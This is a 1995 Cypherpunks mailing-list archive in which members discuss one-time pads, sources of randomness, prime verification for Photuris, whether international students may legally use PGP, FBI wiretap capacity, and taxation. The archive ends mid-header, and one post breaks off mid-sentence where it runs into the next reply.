Everyone: This 1% wiretap thing is getting old. Hint hint hint

- ----

Lastly, regarding cpunk icons, the only ones I was able to find were at the BAP site. I've been drawing a few of my own, one of them is done. It's a yellow diamond that says Cypherpunk on Board. And it has the anarchy-A-inside-a-C symbol. It's interlaced and transparent, so it doesn't look too bad. You're all welcome to steal it at http://students.cs.byu.edu/~don.

Also working on a PGP icon. BAP has an envelope with PGP being the seal. I was thinking maybe a deadbolt ("PGP") with the inscription "Mommy said to lock the doors at night" or some kind of safety lock-your-doors or lock-your-data reference. For the time being I'm working on a simple PGP/ZLDF icon, it will be on my page Real Soon Now[tm]. If you like my icons please tell me.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMJvC7sLa+QKZS485AQFrIgL/VuRfkh7i+K3W3bLyep26riXdZgIVC557
RRcHf9VcacXOGyVvT03JESqNxV/XRcW2k8WDQ+fwhMDEHbHjkzWT5fUxXm6knRGc
K0drBF8WlW0ZobEaiU7SgEnVjus5kFj4
=iAr6
-----END PGP SIGNATURE-----

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed. Junk mail to root at 127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

From markm at omni.voicenet.com Sat Nov 4 12:41:32 1995
From: markm at omni.voicenet.com (Mark M.)
Date: Sun, 5 Nov 1995 04:41:32 +0800
Subject: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID:

On Sun, 5 Nov 1995, amp wrote:

> greetings c-punks,
>
> i may have posted this at some time in the past, as i have asked it
> elsewhere and gotten different responses. i'm interested in that the
> folx here think about it though, so here it is...
>
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.)
>
> i'd like to know if there was a reason not to use the output of pgp
> to do it. i've been playing with the following method. i take a file
> and encrypt it to a key with the '-a' flag on. this generates an
> ascii file that is easily editable using simple, standard rexx calls.
> i strip the first 20 or so lines and the last 20 or so lines
> and put the resulting file aside. then i perform the same operation
> again and append the file to the previous result. i repeat until the
> file is sufficiently large for my purposes and then give the
> resulting file to the person(s) i want to have it.

There is a way to make a file with random contents using PGP. Just type

    pgp +makerandom=xxx file.ext

where xxx is the size of the file you want to create. I would not advise using this or other methods using a pseudo-random number generator.

> i would think that the output of pgp should be pretty darn random. if
> it isn't, then its usefulness is less than its reputation imo. as
> you can tell if you've read this far, i'm not a cryptographer. i just
> like the stuff and am working to become more proficient in its use as
> i think it is important if we are to maintain our privacy in an
> increasingly digital world.

The random output of PGP is pretty random but when the output is used to generate very large OTP's, patterns will no doubt exist. Hardware RNG's are still the best.
`finger -l markm at omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47 20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/

From bsimpson at morningstar.com Sat Nov 4 13:02:18 1995
From: bsimpson at morningstar.com (William Allen Simpson)
Date: Sun, 5 Nov 1995 05:02:18 +0800
Subject: Photuris Primality verification needed
Message-ID: <1972.bsimpson@morningstar.com>

Folks, I was somewhat disappointed in the response to our previous requests for verification of the strength of the prime moduli.

Recently, someone asked for a smaller prime of only 512-bits for speed. This is more than enough for the strength of keys needed for DES, 3DES, MD5 and SHA. Perhaps this would be easier to have more complete and robust verification as well.

Here are two "important" primes for Photuris use. If you have some spare cycles, it would be beneficial for in-depth verification of these strong primes.

Implementation Optional. A 512-bit strong prime (p), expressed in hex:

    da58 3c16 d985 2289 d0e4 af75 6f4c ca92
    dd4b e533 b804 fb0f ed94 ef9c 8a44 03ed
    5746 50d3 6999 db29 d776 276b a2d3 d412
    e218 f4dd 1e08 4cf6 d800 3e7c 4774 e833

The recommended generator (g) for this prime is 2.

Implementation Required. A 1024-bit strong prime (p), expressed in hex:

    97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
    dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
    2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
    b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6
    5e55 4313 828d a83b 9ff2 d941 dee9 5689
    fada ea09 36ad df19 71fe 635b 20af 4703
    6460 3c2d e059 f54b 650a d8fa 0cf7 0121
    c747 99d7 5871 32be 9b99 9bb9 b787 e8ab

The recommended generator (g) for this prime is 2.

> From: Phil Karn
> I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version
> 1.3.2 to test this number. This function uses the Miller-Rabin primality test.
> However, to increase my confidence that this number really is a strong prime,
> I'd like to ask others to confirm it with other tests.
>

Bill.Simpson at um.cc.umich.edu
Key fingerprint = 2E 07 23 03 C5 62 70 D3 59 B1 4F 5E 1D C2 C1 A2

From black at eng.usf.edu Sat Nov 4 13:19:52 1995
From: black at eng.usf.edu (James Black)
Date: Sun, 5 Nov 1995 05:19:52 +0800
Subject: using PGP only for digital signatures
Message-ID:

Hello,

I am in a discussion (during the week) with a system administrator about seeing if we can just make PGP publicly available to everyone, but now the discussion seems to be to just allow PGP to do digital signatures, and I don't think that is the best choice, then.

They are not against PGP being used, but there are legal issues as to whether they can offer it to everyone, as some students are international students, and are not allowed to use the version for the US, or so I have been informed, so now I need to see if we can have the international version, so these students can use it. :(

Are there any good programs (for the Unix, SunOS) that just do digital signature encryption? What they are trying to do is make certain that no one can send a message to anyone, claim to be in the faculty, and cause problems that way.

My position is just a student programmer, but I am trying to learn as much as I can, to answer questions and deal with problems. Thanx.

James Black
black at suntan.eng.usf.edu

From tcmay at got.net Sat Nov 4 13:30:00 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 05:30:00 +0800
Subject: video as a source of public randomness
Message-ID:

At 5:08 PM 11/3/95, Perry E. Metzger wrote:
>Timothy C. May writes:
>> I don't plan to belabor this point. Radioactive decay sources are
>> certainly fine, though not likely to be purchased by most people.
>
>Video digitization equipment connected to TV tuners turned to dead air,
>your suggestion, are equally unlikely to be purchased by most
 ^^^^^^^^^^^^^^^^
>people.
>The geiger counters are very simple and cheap, too.

It is not correct to call this my "suggestion." I was responding to a previous post by Andrew Isaacson who said:

"How useful would it be to use a video stream as a source of random input to something like /dev/random? I'm thinking along the lines of a Connectix QuickCam (sp?) or the cool videocam that comes with the Indy...."

I was commenting on the sources of randomness, such as atmospheric RF variations, antenna configuration, tuner sensitivity, amplifier noise, etc., that would make prediction of snow bits very difficult.

As to suggesting setting the tuner to dead air, this was just one facet of the discussion. I have no brief with any of the proposed schemes: nearly any are better than what we have now, if widely deployed and suitably used.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From warlord at MIT.EDU Sat Nov 4 14:10:51 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Sun, 5 Nov 1995 06:10:51 +0800
Subject: using PGP only for digital signatures
In-Reply-To:
Message-ID: <199511042157.NAA09158@ihtfp.org>

Well, MIT does make PGP available to any and all students and staff! The opinion I've heard is that if the US gov't doesn't want an international student at MIT to use the code, they should keep that student from coming to the US. By allowing the student into the US, the gov't is implicitly giving them the right to use PGP within the US.
It is still illegal for them to export it, however any foreign national can walk up to any computer store and buy anything they wish, and take it on the plane with them. Therefore, in an institution of higher learning, the same standards should be allowed. If the government does not want your student to have access to possibly "dangerous" information, then they should not be allowed into the country at all.

Therefore, I say just make PGP available to your students.

-derek

From black at eng.usf.edu Sat Nov 4 14:18:25 1995
From: black at eng.usf.edu (James Black)
Date: Sun, 5 Nov 1995 06:18:25 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID:

Hello,

On Sat, 4 Nov 1995, Derek Atkins wrote:

> It is still illegal for them to export it, however any foreign
> national can walk up to any computer store and buy anything they wish,
> and take it on the plane with them. Therefore, in an institution of
> higher learning, the same standards should be allowed. If the
> government does not want your student to have access to possibly
> "dangerous" information, then they should not be allowed into the
> country at all.
>
> Therefore, I say just make PGP available to your students.

I'm trying, but all the legal angles need to be covered first. This answer helped a great deal though. Just remember, I am just an undergrad student. :) Thanx.

James Black

From jek at ininx.com Sat Nov 4 14:19:26 1995
From: jek at ininx.com (John E. Kreznar)
Date: Sun, 5 Nov 1995 06:19:26 +0800
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <9511031621.AA11770@zorch.w3.org>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Hallam writes
Stewart writes
>Froomkin writes
>>Hold on. This is more "factoid" than "fact": recall that income
>>is PAID by people as well as EARNED by people. Most payers have
>>easily detectible physical presence and assets that can easily be
>>attached by regulators.
>>It will be a cold day before, e.g., my
>>employer agrees not to report my earnings. And the same is true
>>for most employers in most industries.
>Unfortunately, this is true, at least for people whose employers
>are subject to income tax somewhere. Taxing businesses doesn't
>make sense economically - you could collect almost as much money
>with far less disruption to the underlying economy by taxing it as
>wages for workers and

Why unfortunately? I happen to consider that our modern social economy is a high point of civilisation.

Far from civilized, taxation is a residue of our savage past, and its resurgence in this century is a backwards movement. Relations among civilized people are by mutual consent, or not at all. Taxation (and government generally) is an attempt by one segment of the population (the political segment) to impose a relation upon the rest of us to which we do not consent.

It is certainly a tremendous achievement. We can educate the entire population, provide them with health care, prevent famine and provide protection against crime and aggression by other states. All in all rather a good deal. While one might wish to personally avoid paying taxes there are no benefits if everyone avoids paying taxes. There are significant areas of the economy which can only be funded through social mandates, roads for example.

My interest in cypherpunks is for its potential to enable a personal cryptographic defense against the arrogant aggressiveness of these arbitrary and intrusive politically motivated ``social mandates''. What is your interest in cypherpunks? To know your intended victims, perhaps?

Few people realise that when they use their credit card in a supermarket they are supplying a direct mail marketing company with a profile of their spending patterns. They are also providing a statement of where they are, and indirectly their income, residence etc.

So, don't use a credit card!
What is needed is stringent data protection laws which enforce the confidentiality of personal information. Note that both the SEPP and STT payments systems conceal the credit card number from the merchant. Cryptographic locks on individual parts of the picture are insufficient however. What is needed is laws which make the financing of the underlying architecture uneconomic.

Ah yes. More ``social mandates''

[I don't have time to read or write cypherpunks these days, but the idea that there's something civilized about taxation leapt out at me and demanded a response.]

John E. Kreznar  | 44D955A1F452DF66 | Taxes are caused by people
jek at ininx.com | A1575DEF434DC152 | wanting government benefits.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i
Comment: ...because I decline on principle to affirm any nationality.

iQCVAgUBMJvhbQor0ZwpiwZpAQEARgP/bOpwC16JYTxaAA5ExHOEWQl/V6FYTHmo
46MrGVhSh6WLW6yIwMi2I4mhqISjzV6BtFf+/qu6JOOq7JejqdXKZX4SMcAAWuXh
I+p3WSm5QwfLj9rfiKdnCfpO1NNsxx/HBeCIaXEY0tGVbWVp38vf+Kwugoe6a62C
3ylLFqNzgF4=
=NAy5
-----END PGP SIGNATURE-----

From mhkohne at discordia.org Sat Nov 4 14:43:57 1995
From: mhkohne at discordia.org (Michael Kohne)
Date: Sun, 5 Nov 1995 06:43:57 +0800
Subject: consumer products that make nice sources
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 10:34 PM 11/3/95, Timothy C. May wrote:
>At 5:46 PM 11/3/95, Brad Dolan wrote:
>
>>The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred
>>I think the following is the right phone number.
>>
>>Sunshine Mine is an amusing concept. People pay money to go breathe radon
>>there, while others are spending much money avoiding radon.
>>
>>Anyway, the pillows make nice sources and good conversation pieces.
>
>I'd say they make poor sources. Far too large. A smaller source has better
>access to the detector without adding much to the overall background the
>user is exposed to.
>(I'm not saying low-level uranium or thorium sources
>are much of a hazard, but the fluence presented at the detector is very low
>for such an extended source.)

If it's a cheap source of higher-than-background radiation, try a smoke detector. They are getting darn cheap these days, and my First Alert Model 83R says it contains 1.0 Microcurie of Americium 241. This should raise the count rate significantly over background. And if one isn't enough, you could always get several, remove the module with the radioactive materials in it (it's a sort of black cylinder in mine) from several, and put them all in a box with the radiation detector.

As I remember, I bought 2 or three of these detectors in a single package for about $15 3 years ago. They should be quite cheap by now.

Although, I don't think it has the same sort of humor value as the pillow. (What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJvmh4P3Pba7OSlRAQEDlwP8Cm4vryVejfJZoSd/amwFLxJZWYnPHNxS
3KCmw8jSKjFk4iF+wTvWAHbFIjjkKFGBLt6+BMbDt2eUM6R87mNay1nMASsCoweL
syDr4D39XDUGF6sw7TDulLTW62u7JKaCIGoBQU5+uU4Qxs3YA4QVVR+sLi885ngt
o0GEIeVgLw8=
=hNXr
-----END PGP SIGNATURE-----

----
Michael Kohne
mhkohne at discordia.org or mhkohne at moberg.com
"Quantum mechanics is your friend"
Key fingerprint = EE 22 9D 9B 32 5E F1 37 D2 B3 DC 78 19 24 D1 E8

From jamesd at echeque.com Sat Nov 4 15:12:08 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 5 Nov 1995 07:12:08 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <199511042303.PAA29063@blob.best.net>

> What is very odd however is the FBI request for $500 million.
> [to tap phones]

What is odd about that? -- when I visited Cuba a couple of years ago it looked to me as if a major chunk of the GNP went into watching people. (I hear the situation has improved since then, perhaps thanks to their continuing bankruptcy.)
At 12:09 PM 11/2/95 -0500, hallam at w3.org wrote:
> When the NSA are being asked to comment on an export license they
> are being asked "is this thing dangerous", not "should it be exported".
> But when the response comes back to commerce "its dangerous" you can
> hardly expect the person on the other end to put their neck out on the
> line and risk allowing [...]

This of course is the basic evil of government regulation: Bricks are dangerous. Two by fours are dangerous. Water is dangerous. Playgrounds are dangerous. Everything is dangerous, because everything could be used to cause harm, deliberately or accidentally.

Therefore every action needs to be supervised, controlled, and directed by your wise and benevolent government, and any attempt to avoid the benevolent observation of the all seeing eye shows that you must be a child pornographer-terrorist-drug-trafficker-money-launderer.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From jamesd at echeque.com Sat Nov 4 15:12:09 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 5 Nov 1995 07:12:09 +0800
Subject: Telephone switch capacity -Reply
Message-ID: <199511042303.PAA29072@blob.best.net>

At 06:43 PM 11/3/95 -0800, Rich Graves wrote:
> Of course the FBI doesn't have the staff to listen to all these lines, and
> they need an individual court order to authorize each individual
> interception, so this numbers game is a bit of a joke.

This is false: The FBI is legally authorized to intercept phone lines by court order "or other lawful authority".

From the money it would seem that "other lawful authority" intercepts vastly exceed court ordered intercepts.
You will recall the vast outcry in the liberal lapdog press when this vast new power was given to them -- You don't recall it?! Neither do I. This is one of the many vast extensions of government power that we see come down at a steadily increasing rate, to the accompaniment of total silence from a compliant and submissive mass media.

> There is no controversy about the number of wiretaps that have been
> authorized, except as manufactured by the Spotlight folks and other
> conspiracy loons.

If the only taps are court ordered wiretaps, it would seem we are paying about half a million to a million dollars per wire tap, which is a shade expensive even for government work.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From cryptech at mcs.net Sat Nov 4 15:21:11 1995
From: cryptech at mcs.net (Mike Rosing)
Date: Sun, 5 Nov 1995 07:21:11 +0800
Subject: Version 2 Elliptic Curve Crypto
Message-ID:

Howdy,

I blew it the first time, but the correct elliptic.2.tar now sits on ftp.csua.berkeley.edu/pub/cypherpunks/ciphers. This version is twice as fast as eliptic.tar. A newer version of the elliptic.2.doc is being fixed right now, the only difference with what is posted is a correct reference to the CRYPTO '95 article on polynomial basis inversion. Enjoy.

For a compiled version on Sun or under Borland C++ contact Steve Albrecht (eh at mcs.com). He is in the process of setting up macros to get this to compile under just about any unix system. He's also fixed quite a few bugs and is cleaning up a bunch of uninitialized data structures that I didn't notice. Last I heard it was working, so if you want to play on a specific platform, contact Steve directly.

Hilarie Orman from U.
Arizona (one of the authors of the CRYPTO '95 paper) thinks that calling elliptic curves "strong crypto" may be over selling it. I'm not enough of a mathematician to know how to argue, but it seems to me that almost perfect random output is about as close to strong crypto as one could get. Security thru obscurity doesn't work, elliptic curves are obscure and so far not studied to the same extent as RSA or DES. However, I'll make the claim that elliptic curves are "strong crypto" until proven otherwise.

Along those lines, does any one have a classic text to encrypt for a plaintext/ciphertext challenge? I'll put something together and post it in the next few weeks. I'll use the symmetric encryption subroutine. If there is any interest, should I put out a public key challenge as well? Note, I ain't rich, so only token prizes (like $50 ecash and $50 real for each challenge). The point is to check if this is credible crypto, that's all.

E-mail replies to cryptech at mcs.com. Thanks for reading this!

Patience, persistence, truth,
Dr. mike

From loki at obscura.com Sat Nov 4 15:36:08 1995
From: loki at obscura.com (Lance Cottrell)
Date: Sun, 5 Nov 1995 07:36:08 +0800
Subject: alt.anonymous.messages considered harmful
Message-ID:

I will feed alt.anonymous.messages to ANYONE who asks. I will accept a feed of that one group from any news server which is used by a remailer.

-Lance

At 1:13 PM 11/2/95, Futplex wrote:
>Name Withheld by Request writes:
>[re: problems with the Usenet newsgroup model of pseud/anonymous message pools]
>> Denial of service attacks could be made somewhat less feasible by
>> making the pool accessible as a mailing list and via http.
>
>Mailing lists of course suffer the problem of strictly limited participation.
>The web approach might work better, in some future with better privacy-
>protecting infrastructure in place.
>Specifically, if HTTP transactions with
>a popular web server were routinely encrypted, then all reasonably long
>visits to that site would act as cover traffic for a message pool on that
>server. As a bonus, you could have a spiffy form on the web page that
>searches the pool for you.
>
>In any event, the server could log your exploration. This returns us to the
>issue of strongly anonymous web proxies. (And we could imagine
>countermeasures, like daemons that search for randomly selected pseudonym tags
>to muddy the waters. As Tim might say, lots of issues.)
>
>Also, the mention of "as a mailing list _and_ via http" is significant. Making
>the pool available in multiple forms seems to be an unconditional benefit.
>
>-Futplex

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From ses at tipper.oit.unc.edu Sat Nov 4 15:39:29 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 07:39:29 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511042157.NAA09158@ihtfp.org>
Message-ID:

On Sat, 4 Nov 1995, Derek Atkins wrote:

> student from coming to the US. By allowing the student into the US,
> the gov't is implicitly giving them the right to use PGP within the
> US.

This is kind of a risky policy to take. The general feeling I get that allowing non green-card holders access to strong cryptography is sort of decriminalised, in that the police aren't likely to break down your door and have your AFS server accidentally fall down stairs.
However, it is still against the law, and could be used against the university in other unrelated circumstances.

It seems that licences allowing foreign nationals access to cryptographic software within the US are pretty easy to get, and especially for something like PGP on a central machine.

Simon

// My name is Spero, Simon Spero - licence to encrypt

From ses at tipper.oit.unc.edu Sat Nov 4 15:47:02 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 07:47:02 +0800
Subject: consumer products that make nice sources
In-Reply-To:
Message-ID:

On Sat, 4 Nov 1995, Michael Kohne wrote:

>
> Although, I don't think it has the same sort of humor value as the pillow.
> (What's that hooked to your computer Mike? It's a pillow Bob. Don't ask.)
>

I've always wanted to make a RNG by sticking a Brownian motion detector into a really hot cup of tea...

Simon

// Share and Enjoy(tm)

From stewarts at ix.netcom.com Sat Nov 4 16:07:14 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:07:14 +0800
Subject: using pgp to make an otp
Message-ID: <199511042351.PAA07430@ix4.ix.netcom.com>

At 09:58 AM 11/5/95 -0500, amp wrote:
>i want a source of data for use as a otp.
....
>i'd like to know if there was a reason not to use the output of pgp

Either PGP is a strong enough cryptosystem that you don't need to use a one-time-pad, or it's not, in which case you need better randomness than PGP will give you (I doubt it), or you have special applications for which PGP is impractical (like decrypting small amounts of data on a very wimpy machine in an environment that you can easily distribute OTP keys (for using ONCE ONLY)). Or you're just doing it for fun.

A OTP can give you provably secure cryptography, given that the pad is only used once, and has real randomness behind it. If it's only pseudo-random numbers (e.g. generated from some algorithm), then it's as crackable as the source of random numbers, and therefore no longer provably secure.
And of course, if you use it more than once, or your pad distribution isn't secure, you lose.

>i still need a program to make use of the otp i've produced,

Two alternatives - spend 5 minutes writing it in a language you know well, or pick a language you don't know very well and use it as an excuse to learn the language. It's slightly more complex than "hello, world", since you need to input data from two files and use XOR.

>what are the holes in this? why would it be unadvisable to do it?

The big problem with OTPs (other than getting people to use the pads ONLY ONCE, since they're otherwise hosed) is shipping them around; the traditional method is guys with briefcases handcuffed to their arms....

>otoh, would it be a good basis for a otp?

Large quantities of good random numbers are hard to find. Small quantities can come from dice or throwing darts at the stock market pages; the zener diode or radioactivity methods people have been discussing will produce larger quantities if you've got the equipment. If you've got one of those new radio-tuner boards for your PC, tuning it to an unused station might be quite decent, and we've just been discussing whether video is any good. With many of these sources, it's probably worth grinding the numbers through some sort of compression or encryption algorithm just to smudge over any periodicity or other structure to it.
#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Sat Nov 4 16:07:19 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:07:19 +0800
Subject: Telephone switch capacity
Message-ID: <199511042351.PAA07347@ix4.ix.netcom.com>

> Please be aware that the current capacity of the
>telephone system in the United States (and for that matter,
>most of the developed world) is only capable of supporting
>between 15 and 20 percent simultaneous telephone
>conversations. If the FBI wishes to set up a system that is
>capable of monitoring 1% of the total number of lines, that
>equates to an ability to tap 5%, not 1% of all calls in progress.

The FBI now says they only want to tap 1% of simultaneous capacity, not 1% of total number of lines. On the other hand, the actual utilization of the telephone network is also much lower than the number of lines - back when I was a voice-telephony geek, our estimates for busy-hour phone utilization were about 1/12 for residential and 1/6 for business (3 and 6 hundred call-seconds per hour); that was before widespread use of fax machines, modems, or LANs, so business utilization has probably increased.

Equipped trunk capacity was typically enough to have a maximum of 1% blocking during busy hour, which means a certain amount of margin over average calls in progress, and switch capacity depends radically on technology - some kinds of switches are non-blocking, while others have various capacity limits.

"One Bell System - It Works!"
#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Sat Nov 4 16:08:29 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:08:29 +0800
Subject: Video as a source of randomness
Message-ID: <199511042352.PAA07530@ix4.ix.netcom.com>

>>How useful would it be to use a video stream as a source of random input
>>to something like /dev/random? I'm thinking along the lines of a
>>Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
>>It seems to me that the picture received by a camera sitting atop a
>>monitor would be quite unpredictable. (relatively) High bandwidth, too.

Depends on what the camera's looking at - the first frame you grab may have a lot of entropy, but if there's nothing much going on in the room, one frame's going to look a lot like the next. Of course, pointing the camera at your keyboard and taking a video of you typing in lots of random numbers will probably produce better randomness than just timing the keys while you do so... But do move it away before typing in your passphrase...

Pointing the camera at a snowy TV or out the window or at a cat playing with catnip can generate much more randomness if you need it.

Somebody was saying that of course not many computers will have video capture devices on them, but it was probably one of those parochial PC or Unix geeks who forget that Mac users get all the cool video/audio gear long before the rest of us :-)

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Sat Nov 4 16:08:41 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sun, 5 Nov 1995 08:08:41 +0800
Subject: /dev/random - using up entropy?
Message-ID: <199511042352.PAA07554@ix4.ix.netcom.com>

The discussions of what to do when /dev/random has handed out all of its available entropy have assumed that entropy gets used up; I'd like to propose that maybe it doesn't, at least in the computational-complexity sense that says that you don't have the computational power around to calculate the information inside /dev/random from the output, giving a sort of "computational entropy" that reflects not only the uncertainty you have because of randomness but also the uncertainty you have because of your computational limitations.

Most of the designs I've seen look like this:
    A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096
    An input stream I = I1....Ik, which is mixed into R
    A mixing function F which is used to mix R <= F(R,I) for some chunk of I, possibly empty.
    A hash function H, typically MD5.
    An output O = O1...Om = H(R), and E gets mixed after every output.
    (These are capital-o, not zero...)

The entropy E of the reservoir E before an output is
    -SUM(all X) p(X) log p(X)
where X is an event R1=x1, R2=x2 ... Rn=Xn
which is equal to n, assuming the Ri are iid equiprobable 0 or 1.
After an output, the entropy is
    - SUM p(X | H(R)=O) log p(X|H(R)=O)
which works out to n-m, since p(X) is zero if H(R)!=O, and 2**m/2**n if it does.

So that says you use up m bits of entropy if you get m bits of good output.

However, what I'd like to suggest is that you don't, from the perspective of a user who doesn't have direct access to the reservoir R of random bits. For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because the user is neither able to invert H, nor to enumerate all possible R, nor to calculate anything useful based on multiple outputs, since the reservoir R is shuffled between outputs; even a simple circular shift may be enough.
This doesn't apply to the case where n is 32 or 48 and the hash function produces n-bit outputs, or even m< Message-ID: <199511050001.QAA09434@ihtfp.org> > This is kind of a risky policy to take. The general feeling I get that > allowing non green-card holders access to strong cryptography is sort of > decriminalised, in that the police aren't likely to break down your door > and have your AFS server accidentally fall down stairs. However, it is > still against the law, and could be used against the university in other > unrelated circumstances. Actually, it's not. There is precedent, in that at one point (rumour mode on -- I have not verified this story) MIT was asked to not allow certain students into the MIT nuclear reactor. These international students had been accepted into the Nuclear Engineering program, which sort of requires them to have access. MIT's response was to tell the gov't that if they didn't want to let these students have access to the nuclear reactor, then they should not be allowed in the country, since MIT will not discriminate against students based on silly criteria such as where they live. The state department said they couldn't do that, since they had nothing to keep the students out of the country. MIT responded that they couldn't do it either, and the gov't backed down. I'm not convinced that it is as risky as you say. Besides, MIT does have a lot of political power, so they are more likely to get away with it than other places might. However I think it is a reasonable position for an educational institution to take. -derek From tcmay at got.net Sat Nov 4 16:19:07 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 5 Nov 1995 08:19:07 +0800 Subject: using PGP only for digital signatures Message-ID: Pop Quiz: If you are a citizen of the U.S., prove it. At 11:33 PM 11/4/95, Simon Spero wrote: >On Sat, 4 Nov 1995, Derek Atkins wrote: > >> student from coming to the US. 
By allowing the student into the US, >> the gov't is implicitly giving them the right to use PGP within the >> US. > >This is kind of a risky policy to take. The general feeling I get that >allowing non green-card holders access to strong cryptography is sort of >decriminalised, in that the police aren't likely to break down your door >and have your AFS server accidentally fall down stairs. However, it is >still against the law, and could be used against the university in other >unrelated circumstances. > >It seems that licences allowing foreign nationals access to cryptographic >software within the US are pretty easy to get, and especially for >something like PGP on a central machine. We really need to put this one to bed. As has been said several times recently, for the purposes of law, non-U.S. citizens who reside in the U.S. are effectively "U.S. persons." Subject to U.S. law and generally having the same legal rights. (Can't vote. Can be drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. Must not discriminate against the differently clued, etc.) All of the nonsense about wearing a "munitions shirt" in front of a "foreigner" seems to miss this essential point. Ditto for PGP use. Consider this: most people in the U.S. do not have a "credential" that shows them to be U.S. citizens. (Hint: most people in the U.S. do not have passports.) They have driver's licenses, which say nothing about citizenship (at least California and Virginia licenses do not). Social Security cards are the same. (Second hint: most people are hard-pressed to locate a birth certificate for themselves. Many people take the easy way out and simply buy a new one for the $25 a good one costs.) Therefore, there are few ways that citizenship can be "checked." Period. A foreigner who wishes to "prove" his non-U.S. status could, of course, show his green card. But this is different from proving citizenship. 
As to the USF--or was it SFSU?--student worried about "allowing" PGP to be used...I despair at this outlook. Why not simply ignore the issue, not "give" them PGP, but instead have a few pointers to where PGP may be gotten. As to the point about students impersonating faculty, if the faculty starts signing their messages (doubtful), then no one can impersonate _them_. (Except that it sounds like all this PGP stuff is to happen on campus computers, in which case there are several ways their private keys and passphrases can be snarfed.) The issue of a "credential" for faculty members, something that says "This person is a member of the Foo U. faculty," well, this is a different kettle of fish; such credentials are not part of the PGP system, though webs of trust could in principle be used in a klugey kind of way. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Sat Nov 4 16:22:23 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 5 Nov 1995 08:22:23 +0800 Subject: Video as a source of randomness Message-ID: At 11:51 PM 11/4/95, Bill Stewart wrote: >Pointing the camera at a snowy TV or out the window or at a cat playing >with catnip can generate much more randomness if you need it. Which would make that "dev/cat," right? --Klaus! From stewarts at ix.netcom.com Sat Nov 4 16:52:34 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 5 Nov 1995 08:52:34 